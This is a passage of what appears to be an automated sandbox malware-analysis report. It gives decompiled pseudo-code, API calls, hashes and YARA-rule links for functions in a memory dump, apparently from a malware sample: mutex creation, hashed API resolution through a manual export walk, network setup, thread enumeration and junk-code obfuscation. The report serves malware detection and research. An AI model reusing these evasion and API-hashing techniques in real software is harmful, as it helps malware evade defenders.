				_t5 = CreateMutexW(_a4, 0, _a8); // executed
				_t17 = 0;
				_t25 = _t5;
				if(_t5 != 0) {
					_t15 = _t5;
					_t8 = E000DBF50(_t25, 0, E000D9D50(0x640dea48));
					_t10 = E000D3750(_t25,  *_t8(_t15, _a12), 0xffffff7f);
					_t26 = _t10;
					if(_t10 == 0) {
						_t17 = _t15;
					} else {
						_t11 = E000DBF50(_t26, 0, 0xb8e7db5);
						 *_t11(_t15);
					}
				}
				return _t17;
			}

0x000eb723
0x000eb72f
0x000eb731
0x000eb733
0x000eb735
0x000eb73a
0x000eb74c
0x000eb75e
0x000eb766
0x000eb768
0x000eb77e
0x000eb76a
0x000eb771
0x000eb77a
0x000eb77a
0x000eb768
0x000eb786

APIs

CreateMutexW.KERNEL32(?,00000000,000F2850,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000EB72F

Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: CreateLibraryLoadMutex
String ID:
API String ID: 427046056-0
Opcode ID: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction ID: 289dafd7e4d99ad27e28c80940f6d9b9e582ee69d927a0f14c355ea8da985234
Opcode Fuzzy Hash: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction Fuzzy Hash: 61F062ABA453297BE61026B56C43FAB724C8BD1A67F060025FE1CA7386EA51AD0041F2

Uniqueness

Uniqueness Score: -1.00%

Function 000D8290, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000D8290(intOrPtr _a4) {
				void* _t4;
				long _t6;
				void* _t8;
				intOrPtr _t9;

				_t9 = _a4;
				_t19 = _t9;
				if(_t9 == 0) {
					__eflags = 0;
					return 0;
				}
				_t4 = E000D1460(_t19, _t9, E000D9D50(0x1bde8cd4));
				_t6 = E000D22E0(_t19, _t4 + 4, E000D9D50(0x1bde8cd4));
				E000DBF50(_t19, 0, 0x8685de3);
				_t8 = RtlAllocateHeap( *0xf2124, 8, _t6); // executed
				return _t8;
			}

0x000d8294
0x000d8297
0x000d8299
0x000d82ec
0x00000000
0x000d82ec
0x000d82aa
0x000d82c6
0x000d82d7
0x000d82e8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000D82E8

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c2dfccd7380c664e5a890f5ef95fa4677a8fc6dd2e538460ef496d8c4d0ad036
Instruction ID: 12d73507369016189746c0016f8c7c45102c3eea82347becb9a20daa1e9037b3
Opcode Fuzzy Hash: c2dfccd7380c664e5a890f5ef95fa4677a8fc6dd2e538460ef496d8c4d0ad036
Instruction Fuzzy Hash: 47E03066D516247BE55132A0BC03AFB35888B1277AF0B0032FD0DB6343E9426A1443FB

Uniqueness

Uniqueness Score: -1.00%

Function 000EC210, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000EC210(void* __eflags) {
				char _v408;
				intOrPtr* _t2;
				signed short _t3;
				void* _t5;

				_t2 = E000DBF50(__eflags, 6, 0xaaf7240); // executed
				_t3 = E000D9BA0(_t2, 0x2ae);
				_t5 =  *_t2(_t3 & 0x0000ffff,  &_v408); // executed
				return E000D55C0(_t5, 0) & 0x00000001;
			}

0x000ec221
0x000ec230
0x000ec243
0x000ec25a

APIs

WSAStartup.WS2_32(?,?), ref: 000EC243

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction ID: 4b5e65aae6b2d1efe121db45faa00fd8f7a28187914ab2d097b4054b3ac83616
Opcode Fuzzy Hash: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction Fuzzy Hash: 5AE086B2D4031437E52072B17C17FF636488711725F450062FE4C552C3F456662880F6

Uniqueness

Uniqueness Score: -1.00%

Function 000E0390, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E0390(void* __eax) {
				void _v12;
				void* _t4;
				int _t7;
				void* _t15;

				_v12 = 0xa;
				_t4 = E000D9D50(0x647400bf);
				E000DBF50(_t15, _t4, E000D9D50(0x61c0d6ad));
				_t7 = InternetSetOptionA(0, 0x49,  &_v12, 4); // executed
				return _t7;
			}

0x000e0395
0x000e03a1
0x000e03ba
0x000e03cc
0x000e03d3

APIs

InternetSetOptionA.WININET(00000000,00000049,?,00000004,?,?,?,000DC94D), ref: 000E03CC

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: InternetOption
String ID:
API String ID: 3327645240-0
Opcode ID: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction ID: f4fc558fe1b28674f11d981f8b773c1249634b056fd757ecbb5d32feab1d5685
Opcode Fuzzy Hash: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction Fuzzy Hash: 4BE08CE6D803143AE65062D0AC03FFB355C8B12229F060071FA0DA5383F5A666148AF3

Uniqueness

Uniqueness Score: -1.00%

Function 000E8F40, Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000E8F40(intOrPtr _a4, intOrPtr _a8, signed char _a12, signed char _a16, char _a20) {
				char _t8;
				signed int _t11;
				signed int _t13;
				char _t14;
				void* _t15;

				if(_a8 == 0) {
					L7:
					return _t8;
				}
				_t13 = _a16 & 0x000000ff;
				_t11 = _a12 & 0x000000ff;
				_t14 = 0;
				_t18 = 0;
				if(0 != 0) {
					L5:
					_t18 = _a20;
					if(_a20 != 0) {
						E000DBF50(_t18, 0, 0x7a2bc0);
						_t15 = _t15 + 8;
						Sleep(0x14); // executed
					}
					while(1) {
						L3:
						 *((char*)(_a4 + _t14)) = E000DD620(_t11, _t13);
						_t8 = E000D1460(_t18, _t14, 1);
						_t15 = _t15 + 0x10;
						_t14 = _t8;
						if(_t8 == _a8) {
							goto L7;
						}
						if(_t14 == 0) {
							continue;
						}
						goto L5;
					}
					goto L7;
				}
				goto L3;
			}

0x000e8f4a
0x000e8fa5
0x000e8fa5
0x000e8fa5
0x000e8f4c
0x000e8f50
0x000e8f54
0x000e8f56
0x000e8f58
0x000e8f86
0x000e8f86
0x000e8f8a
0x000e8f93
0x000e8f98
0x000e8f9d
0x000e8f9d
0x000e8f60
0x000e8f60
0x000e8f6d
0x000e8f73
0x000e8f78
0x000e8f7e
0x000e8f80
0x00000000
0x00000000
0x000e8f84
0x00000000
0x00000000
0x00000000
0x000e8f84
0x00000000
0x000e8f60
0x00000000

APIs

Sleep.KERNEL32(00000014), ref: 000E8F9D

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction ID: 84dd65260700af12c1c3e47a24e984592855d9e194a6ff5662f329dc8a77b220
Opcode Fuzzy Hash: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction Fuzzy Hash: 4FF02B719453ED7ECB311A22AC45FEE3B858B82B69F194172FC4D39383D921895083F1

Uniqueness

Uniqueness Score: -1.00%

Function 000DB570, Relevance: 1.3, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000DB570(void* _a4) {
				void* _t2;
				int _t4;
				void* _t5;

				_t5 = _a4;
				_t8 = _t5;
				if(_t5 != 0) {
					E000DBF50(_t8, 0, 0xb86de55);
					_t4 = HeapFree( *0xf2124, 0, _t5); // executed
					return _t4;
				}
				return _t2;
			}

0x000db574
0x000db577
0x000db579
0x000db582
0x000db593
0x00000000
0x000db593
0x000db597

APIs

HeapFree.KERNEL32(00000000,000E54D2,000E54D2,?), ref: 000DB593

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2fff299a361e8af46d9b9b5394ad03620459419cd5712241ecd2fa6167a2789a
Instruction ID: 8ea6aae5816049e169f7bffd0401ed29982ad1c5eccc562260893a283648c4f6
Opcode Fuzzy Hash: 2fff299a361e8af46d9b9b5394ad03620459419cd5712241ecd2fa6167a2789a
Instruction Fuzzy Hash: 49D02332641324B3D5111780BC03F96374CCB10F91F050021FE0C773555141391045F0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000DD830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E000DD830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E000E12D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E000D9D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E000D9D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E000D1460(_t205, E000D1460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E000D1460(0,  ~( *_t143), _v40));
							E000D1460(0,  *_t143, _a4);
							E000E8F20( &_v140, E000D9D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E000ED680(0, _t91);
									_t176 = _t176 - E000D22E0(0, 0, 1);
									E000D1460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E000E00A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E000D1460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E000D9D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E000D22E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E000D1460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E000D7DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E000D1460(__eflags, E000D22E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E000D1460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E000D1460(__eflags, _t137, E000D9D50(0x3638cbc4));
										E000D1460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E000D7DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E000D9D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E000D7DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E000D7DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E000D55A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x000dd839
0x000dd83c
0x000dd83e
0x000dd840
0x000dd847
0x000dd852
0x000dd854
0x000dd85b
0x000dd860
0x000dd862
0x000dd865
0x000dd86d
0x000dd873
0x000dd873
0x000dd880
0x000dd894
0x000dd89f
0x000dd8af
0x000dd8b4
0x000dd8bb
0x000dd8be
0x000dd8c4
0x000dd8cc
0x000dd8d0
0x000dd8d2
0x000dd8d5
0x000dd8ea
0x000dd8f0
0x000dd90d
0x000dd912
0x000dd915
0x000dd919
0x000dd91b
0x000dd920
0x000dd92c
0x000dd942
0x000dd944
0x000dd949
0x000dd94c
0x000dd950
0x000dd920
0x000dd954
0x000dd95d
0x000dd962
0x000dd968
0x000dd98d
0x000dd9c4
0x000dd9d0
0x000dd9d8
0x000dd9db
0x000dd9e0
0x000dd9e5
0x000dd9e7
0x000dd9ea
0x000dd9ec
0x000dd9f2
0x000dd9fc
0x000dd9fe
0x000dda06
0x000dda0e
0x000dda11
0x000dda16
0x000dda19
0x000dda1c
0x000dda1e
0x000dda20
0x000dda22
0x000dda24
0x000dda24
0x000dda2c
0x000dda30
0x000dda30
0x000dda45
0x000dda51
0x000dda56
0x000dda5b
0x000dda61
0x000dda65
0x000dda68
0x000dda68
0x000dda30
0x000dda83
0x000dda88
0x000dda9a
0x000ddaaa
0x000ddab1
0x000ddabe
0x000ddac8
0x000ddad7
0x000ddae5
0x000ddaec
0x000ddaf3
0x000ddaf6
0x000ddb05
0x000ddb0c
0x000ddb11
0x000ddb14
0x000ddb16
0x000ddb54
0x000ddb18
0x000ddb1e
0x000ddb21
0x000ddb23
0x000ddb59
0x000ddb25
0x000ddb25
0x000ddb30
0x000ddb35
0x000ddb3a
0x000ddb44
0x000ddb47
0x000ddb4a
0x000ddb4b
0x000ddb4b
0x000ddb4f
0x000ddb4f
0x000ddb23
0x000ddb70
0x000ddb70
0x000dd9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x000dd96a
0x000dd973
0x000dd974
0x000dd977
0x000dd97a
0x000dd983
0x000dd983
0x000dd86d
0x000ddb72
0x000ddb7b

APIs

LoadLibraryA.KERNEL32(?), ref: 000DDB62
GetProcAddress.KERNEL32(00000000,?), ref: 000DDB6A

Strings

d, xrefs: 000DDAB1
l, xrefs: 000DDAC8

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: dc93868cf63f52f6e76aead13cbcdb0a3a241c06c2eea5036e4de1166b4958bc
Instruction ID: 6ac562511bee486726a2c7d9b541d6ce3eff0e8f27a465fb8bd1e3487678933e
Opcode Fuzzy Hash: dc93868cf63f52f6e76aead13cbcdb0a3a241c06c2eea5036e4de1166b4958bc
Instruction Fuzzy Hash: 0291F8B6D00315ABDB109FB4AC42AFE7BA5AF16358F450066EC49B7343EA319A1487B1

Uniqueness

Uniqueness Score: -1.00%

Function 000E69A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E69A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E000D9D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E000D55C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E000D55C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x000e69b2
0x000e69c1
0x000e69ca
0x000e69d9
0x000e69de
0x000e69e3
0x000e6a25
0x000e6a25
0x000e69eb
0x000e69eb
0x000e69ef
0x000e69f0
0x000e69ff
0x000e6a04
0x000e6a11
0x000e6a1d
0x000e6a21
0x00000000
0x00000000
0x000e6a23
0x000e6a21
0x00000000
0x000e6a1d
0x00000000
0x000e69f0
0x000e6a27
0x000e6a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000E69AD
GetCurrentProcessId.KERNEL32 ref: 000E69C4
Thread32First.KERNEL32(00000000,?), ref: 000E69D1
GetLastError.KERNEL32 ref: 000E69F0
Thread32Next.KERNEL32(00000000,?), ref: 000E6A16

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: ce297d60281bf4069ad4591a643bc3b1ba39e77d73970ad2db4fbd700c17b3ac
Instruction ID: 84f46d719f9ad2763e0b57bed1dc68c864fbe30675a1be7fb2114ee33d4cc758
Opcode Fuzzy Hash: ce297d60281bf4069ad4591a643bc3b1ba39e77d73970ad2db4fbd700c17b3ac
Instruction Fuzzy Hash: 9701DF72E403446FEB107AA6BC96BFF3E6CAB51355F480131F904B1223E91A990486B2

Uniqueness

Uniqueness Score: -1.00%

Function 000D2340, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000D2340(char _a4) {
				signed int _v20;
				struct HDC__* _v24;
				signed int _v28;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				struct HWND__* _t32;
				int _t34;
				struct HWND__* _t35;
				signed int _t36;
				signed int _t39;
				int _t42;
				signed int _t48;
				signed int _t49;
				signed int _t54;
				void* _t56;
				signed int _t58;
				int _t59;

				_t1 =  &_a4; // 0xd2f73
				_t56 =  *_t1;
				_t34 = _t56 & 0x00000100;
				RegEnumValueW(_t56, _t34, _t34, _t56 & 0xfffffeff, _t34, _t56 & 0xfffffeff, _t56, _t34);
				_t35 = _t34 * _t56;
				_t39 = 0;
				if(_t35 != _t56) {
					_t36 = _t35 | _t56;
					_t32 = _t36 * _t56;
					_t39 = _t36 * _t32 | _t32;
					_t35 = _t32;
				}
				_t54 = _t39 ^ _t56;
				DestroyWindow(_t35);
				_t58 = _t39 * _t54;
				_v20 = _t58;
				_t3 =  &_a4; // 0xd2f73
				_t59 =  *_t3;
				_t42 = _t58 - _t59;
				if(_t59 == 0xaec9ea02 && _t35 != 0xaec9ea02) {
					_t48 = _t42 * _t35;
					_t5 = _t54 - 0x513615fe; // -1362499070
					_t49 = _t48 + _t5;
					_t42 = _t48 + 0xaec9ea02;
					_v24 = _t49;
					_t28 = _t54 * _t49;
					_v28 = _t28;
					_t29 = _t28 + 0xc9;
					_t30 = _t29 * _t35;
					_t35 = _t29 * _t35 >> 0x20;
					_v20 = _t30;
				}
				if(_t35 >= _t59 && _t42 != _t59) {
					MoveToEx(_v24, _t59, _t42, _t59);
					return ((_v28 ^ (_t35 + _v20 & 0x000000ff) * 0xffffffe3) << 0x18) + 0x2a000000 >> 0x18;
				}
				return 0;
			}

0x000d2349
0x000d2349
0x000d234e
0x000d2363
0x000d2369
0x000d236c
0x000d2370
0x000d2372
0x000d2376
0x000d237e
0x000d2381
0x000d2381
0x000d2385
0x000d238a
0x000d2390
0x000d2393
0x000d2398
0x000d2398
0x000d239e
0x000d23a6
0x000d23b2
0x000d23b5
0x000d23b5
0x000d23bc
0x000d23c2
0x000d23c5
0x000d23c8
0x000d23d0
0x000d23d2
0x000d23d4
0x000d23d6
0x000d23d6
0x000d23e2
0x000d23ee
0x00000000
0x000d2410
0x000d2419

APIs

RegEnumValueW.ADVAPI32(s/,s/,s/,s/,s/,s/,s/,s/,?,000D2F73,?,?,?,?,?,000DAE51), ref: 000D2363
DestroyWindow.USER32 ref: 000D238A
MoveToEx.GDI32(00000000,s/,00000000,s/), ref: 000D23EE

Strings

s/, xrefs: 000D2349, 000D2398, 000D235B, 000D235C, 000D235D, 000D235E, 000D235F, 000D2360, 000D2361, 000D2362, 000D2387, 000D23E8, 000D23EA

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: DestroyEnumMoveValueWindow
String ID: s/
API String ID: 1329181790-3311094731
Opcode ID: 8630ca3b2e36bde0f543aad5d577884cbc8ff06bef9849e364e9938c14067508
Instruction ID: f24f2617c315ada4656aa81a10ff16b5fa01be02947cdc14bd54eeb9dc8b1d66
Opcode Fuzzy Hash: 8630ca3b2e36bde0f543aad5d577884cbc8ff06bef9849e364e9938c14067508
Instruction Fuzzy Hash: BE2126717002395FDB1C8AA88CD65BFBEEDEB98660B05013BF406DB7A1E5A48D4182F0

Uniqueness

Uniqueness Score: -1.00%

Function 000D46E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000D46E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x000d46e7
0x000d46ea
0x000d46ed
0x000d46f4
0x000d46fa
0x000d46ff
0x000d4709
0x000d4711
0x000d4713
0x000d4715
0x000d4718
0x000d4720
0x000d4725
0x000d4781
0x000d4784
0x000d4786
0x000d4791
0x000d479a
0x000d479f
0x000d47a1
0x000d47a3
0x000d47ab
0x00000000
0x00000000
0x000d472c
0x000d4731
0x000d473a
0x000d47ad
0x000d47ad
0x000d47b6
0x000d47ca
0x000d47ca
0x000d47cd
0x000d47d1
0x000d47e2
0x000d47e7
0x000d47f9
0x000d47fc
0x000d47fe
0x000d4800
0x000d4806
0x000d4808
0x000d480a
0x000d4810
0x000d481d
0x000d4838
0x000d4838
0x000d4810
0x000d4844
0x000d4844
0x000d47b8
0x000d47be
0x00000000
0x000d47c5
0x000d47c5
0x00000000
0x000d47c5
0x000d47be
0x000d473c
0x000d4743
0x000d4745
0x000d474d
0x000d4845
0x000d4753
0x000d475d
0x000d4760
0x000d476d
0x000d4773
0x000d477c
0x000d477c
0x000d474d
0x000d4743

APIs

OffsetRect.USER32 ref: 000D46FF
LookupPrivilegeValueW.ADVAPI32(00000000,-000F1D33,?), ref: 000D4791
EndDialog.USER32 ref: 000D47D1
SetTextColor.GDI32(-02611D33,-03E51D33), ref: 000D481D

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: 5f299aa4d712137568103ea074311c606deb4ae947a04dd25c1fb5ee591d5d13
Instruction ID: 886ccbea61d33320a4fc21647aace926b6370f7f3d44b6e0c485a2c24c441891
Opcode Fuzzy Hash: 5f299aa4d712137568103ea074311c606deb4ae947a04dd25c1fb5ee591d5d13
Instruction Fuzzy Hash: D6412733B006249BDB18CE58CCE46BF77EAEB95361B16812AE819DB741C634AD45C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 000D29D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000D29D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
